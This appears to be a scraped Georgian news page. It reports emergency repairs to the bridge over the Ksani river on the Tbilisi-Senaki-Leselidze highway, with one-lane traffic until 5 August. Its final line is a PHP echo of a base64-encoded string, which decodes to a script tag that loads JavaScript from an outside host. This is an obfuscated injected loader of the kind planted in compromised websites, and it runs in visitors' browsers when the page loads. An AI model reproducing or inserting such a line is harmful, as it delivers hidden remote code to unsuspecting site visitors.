celsiusi
ავერსი შნაიდერი

 საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს, საავტომობილო გზების დეპარტამენტის ინფორმაციით, საერთაშორისო მნიშვნელობის თბილისი-სენაკი-ლესელიძის საავტომობილო გზის მე-40 კმ-ზე (დასავლეთის მიმართულება), მდინარე ქსანზე არსებულ სახიდე გადასასვლელზე გადაუდებელი სარეაბილიტაციო სამუშაოები ხორციელდება, რომელიც 5 აგვისტოს დასრულდება.

გავრცელებული ინფორმაციის თანახმად, ხიდის სავალ ნაწილზე დაზიანებული იყო ბეტონის დამცავი ფენა, რაც საფრთხეს უქმნიდა ავტოტრანსპორტის უსაფრთხო გადაადგილებას.

„5 ივნისიდან, მიმდინარე სარეაბილიტაციო სამუშაოების გამო, ხიდის სავალ ნაწილზე მოძრაობა ნაწილობრივ შეზღუდულია და ავტოტრანსპორტის მოძრაობა შესაძლებელია ხიდის მხოლოდ ერთ სამოძრაო ზოლში. აღნიშნული შეზღუდვა იმოქმედებს 5 აგვისტოს ჩათვლით.

პროექტის ფარგლებში ხიდის შუალედური ბურჯების შეკეთება უკვე დასრულებულია. სამუშაოები აქტიურად მიმდინარებს მალის ნაშენზე და ხიდის სავალ ნაწილზე, სადაც დღეს დასრულდება ბეტონის ახალი ფილის მოწყობა. ბეტონის შესაბამისი სიმტკიცის მისაღებად საჭიროა 10-14 დღე, რის შემდეგაც დაიგება ასფალტ-ბეტონის საფარი. იგივე სამუშაოები ჩატარდება გზის მეორე ზოლზეც.

საავტომობილო გზების დეპარტამენტი ბოდიშს უხდის მგზავრებს გადაუდებელი სამუშაოების წარმოების გამო შექმნილი დისკომფორტისთვის“, - ნათქვამია გავრცელებულ ინფორმაციაში.

144
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");